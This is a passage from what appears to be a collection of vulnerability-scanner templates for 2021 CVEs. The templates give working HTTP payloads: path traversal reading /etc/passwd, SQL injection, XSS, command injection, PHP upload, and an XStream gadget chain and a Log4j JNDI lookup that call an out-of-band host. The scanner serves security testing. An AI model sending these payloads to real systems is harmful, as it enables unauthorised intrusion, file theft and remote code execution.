/etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey <1.5.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24627","info":{"name":"G Auto-Hyperlink <= 1.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+I\n","GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["c8c605999f3d8352d7bb792cf3fdb25b","Keyword","g-auto-hyperlink-edit"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{string}}"]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4436","info":{"name":"3DPrint Lite < 1.9.1.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353\n\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"action\"\n\np3dlite_handle_upload\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: text/php\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------54331109111293931601238262353--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jsonrpc\":\"2.0\"","\"filename\":","{{filename}}.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\nGET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\nGET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1"],"condition":"and"}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: 